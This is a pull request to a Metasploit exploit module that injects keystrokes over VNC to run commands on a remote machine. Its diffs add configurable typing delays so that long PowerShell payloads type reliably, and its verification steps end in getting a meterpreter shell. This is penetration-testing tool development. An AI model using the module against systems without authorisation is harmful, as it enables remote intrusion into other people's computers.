### PR TITLE
VNC Keyboard Exec: Avoid typing too fast

### DIFF
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -70,8 +70,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def exec_command(command)
+    count = 0
     values = command.chars.to_a
     values.each do |value|
+      count += 1
+      if count % 50 == 0
+        # Small sleeps in long commands to avoid overloading keyboard buffer
+        select(nil, nil, nil, 0.05) # 50ms
+      end
       press_key("\x00#{value}")
       release_key("\x00#{value}")
     end

--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -43,6 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(5900),
         OptString.new('PASSWORD', [ false, 'The VNC password']),
+        OptInt.new('TIME_KBD_DELAY', [ true, 'Delay in milliseconds when typing long commands (0 to disable)', 50]),
+        OptInt.new('TIME_KBD_TRESHOLD', [ true, 'How many keystrokes between each delay in long commands', 50]),
         OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
       ])
   end
@@ -70,12 +72,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def exec_command(command)
+    # Timing configuration: Typing a long command too fast may overload the tagret's keyboard buffer
+    delay_duration = datastore['TIME_KBD_DELAY']
+    delay_treshold = datastore['TIME_KBD_TRESHOLD']
+    delay_treshold = 0 if delay_treshold < 0 or delay_duration <= 0
+    delay_duration = delay_duration.to_f / 1000
+    # Break down command into a sequence of keypresses
     values = command.chars.to_a
     values.each_with_index do |value, index|
-      # Small sleeps in long commands to avoid overloading keyboard buffer
-      sleep(0.05) if index % 50 == 0
       press_key("\x00#{value}")
       release_key("\x00#{value}")
+      sleep(delay_duration) if delay_treshold > 0 and index % delay_treshold == 0
     end
     press_key(ENTER_KEY)
   end

--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(5900),
         OptString.new('PASSWORD', [ false, 'The VNC password']),
         OptInt.new('TIME_KBD_DELAY', [ true, 'Delay in milliseconds when typing long commands (0 to disable)', 50]),
-        OptInt.new('TIME_KBD_TRESHOLD', [ true, 'How many keystrokes between each delay in long commands', 50]),
+        OptInt.new('TIME_KBD_THRESHOLD', [ true, 'How many keystrokes between each delay in long commands', 50]),
         OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
       ])
   end
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exec_command(command)
     # Timing configuration: Typing a long command too fast may overload the tagret's keyboard buffer
     delay_duration = datastore['TIME_KBD_DELAY']
-    delay_treshold = datastore['TIME_KBD_TRESHOLD']
+    delay_treshold = datastore['TIME_KBD_THRESHOLD']
     delay_treshold = 0 if delay_treshold < 0 or delay_duration <= 0
     delay_duration = delay_duration.to_f / 1000
     # Break down command into a sequence of keypresses

--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -70,14 +70,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def exec_command(command)
-    count = 0
     values = command.chars.to_a
-    values.each do |value|
-      count += 1
-      if count % 50 == 0
-        # Small sleeps in long commands to avoid overloading keyboard buffer
-        select(nil, nil, nil, 0.05) # 50ms
-      end
+    values.each_with_index do |value, index|
+      # Small sleeps in long commands to avoid overloading keyboard buffer
+      sleep(0.05) if index % 50 == 0
       press_key("\x00#{value}")
       release_key("\x00#{value}")
     end


### PR DESCRIPTION
This PR adds small delays in the VNC Keyboard Exec to avoid typing long commands too fast.

When trying to use the VNC Keyboard Exec module on several Windows 7 systems, execution got randomly stuck in the middle of typing the PowerShell command. Getting a shell was very unreliable, like 1 time out of 10. I figured out the module was typing too fast, likely overloading the target's keyboard buffer, and tried to add a delay as small as possible to make it work. After some testing, putting small 50ms breaks every 50 characters gave good results with nearly unnoticeable impact.

## Verification

Basically the module works as before but types commands slightly less fast.

- Start `msfconsole`
- `use exploit/multi/vnc/vnc_keyboard_exec`
- `set RHOSTS xx.xx.xx.xx`
- `set PASSWORD thepassword`
- `run`
- **Verify** you get a `meterpreter` shell